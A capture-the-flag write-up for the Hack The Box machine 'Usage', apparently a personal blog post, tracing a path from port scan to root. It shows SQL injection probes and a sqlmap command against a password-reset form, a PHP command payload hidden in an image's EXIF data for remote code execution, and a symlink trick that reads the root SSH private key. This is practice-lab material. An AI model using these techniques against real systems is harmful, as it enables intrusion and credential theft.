USAGE HACKTHEBOX

Usage HTB Writeup | HacktheBox

/ CTF Challenges, HTB / By

Introduction

In this post, You will learn how to CTF Usage from HTB and if you have any doubts comment down below 👇🏾

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on X.

Let’s Hack Usage from HTB 😌

https://twitter.com/HacklikeHacker

Rust Scan

rustscan -a 10.129.209.220
[~] Starting Script(s)
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-19 00:27 +07
Initiating Ping Scan at 00:27
Scanning 10.129.209.220 [2 ports]
Completed Ping Scan at 00:27, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:27
Completed Parallel DNS resolution of 1 host. at 00:27, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 00:27
Scanning 10.129.209.220 [2 ports]
Discovered open port 80/tcp on 10.129.209.220
Discovered open port 22/tcp on 10.129.209.220
Completed Connect Scan at 00:27, 0.03s elapsed (2 total ports)
Nmap scan report for 10.129.209.220
Host is up, received conn-refused (0.030s latency).
Scanned at 2024-04-19 00:27:35 +07 for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Web Service

Whenever I’m working on web application security, I always rely on Wappalyzer. It helps me figure out what kind of web application framework or programming language is being used in the challenge I’m tackling.

Once I figured out which web application framework it was, I found something cool on HackTricks.

User Flag

I took out some vulnerabilities I had chosen, like Debugging mode and Deserialization RCE, because I don’t think there’s a way to exploit them. So, SQL Injection seems like my only choice. But where is it?

I spent a whole day hunting for SQL Injection, and finally, I found it in the Reset Password feature. Here’s the payload I’m using to test it.

' ORDER BY 8;-- -
' ORDER BY 9;-- -

I can prove that this service might be vulnerable because when I tried to increase the number, I got an error page. Let’s use SQL Map to exploit it!

sqlmap -r request -p email --batch --level 5 --risk 3 --dbms=mysql --dbs

I won’t add another payload because I think you can manage it and know the next steps.

After cracking the password, I use the credentials to log in as admin.

I’m pretty sure everyone notices it. The dashboard shows information about the dependencies’ versions.

After looking into vulnerabilities in each dependency, I found something intriguing in encore/laravel-admin: we can ACE.

I’ll upload the payload that demonstrates I can get a reverse shell.

exiftool -Comment="<?php system(\"ping -c 3 10.10.14.28\");?>" payload.jpg
sudo tcpdump -i {interface} icmp

I’ll rename the file to have a “.upload2” extension and wait to see the payload’s result. Yummy! I can run commands!

Next, I’ll create a reverse shell myself, and then I’ll be able to get the user flag.

Lateral movement

I’m searching for how to escalate privileges, but I couldn’t find anything. So, I’m going to try listing all users on the system.

cat /etc/passwd | grep /home

I realize I need to locate Xander’s credentials, but how can I do it? And then, I stumbled upon a file that contained Xander’s credentials. I simply typed “ls -al”.

Privilege Escalation

If you’ve ever played HackTheBox before, you know it’s simple because the first thing we do after getting a user’s password is to check for sudo privileges.

sudo -l

Since this is custom software, there’s no way to attack it using GTFOBins. However, we can utilize the strings command to read binary files.

strings /usr/bin/usage_management

I’ve found a method to get an answer. It’s called Wildcards Spare, and I learned about it from HackTricks.

Let’s hack following the steps we received from HackTricks.

cd /var/www/html
touch @id_rsa
ln -s /root/.ssh/id_rsa id_rsa

There are many ways to get the flag. It’s really cool to take a screenshot and enter it as the root user. Then, I can read the SSH key to log in to the system.

Conclusion

In summary, exploring this box was a rich learning opportunity, highlighting diverse hacking techniques and tools.

From exploiting vulnerabilities to privilege escalation, each step underscored the importance of continual learning in cybersecurity.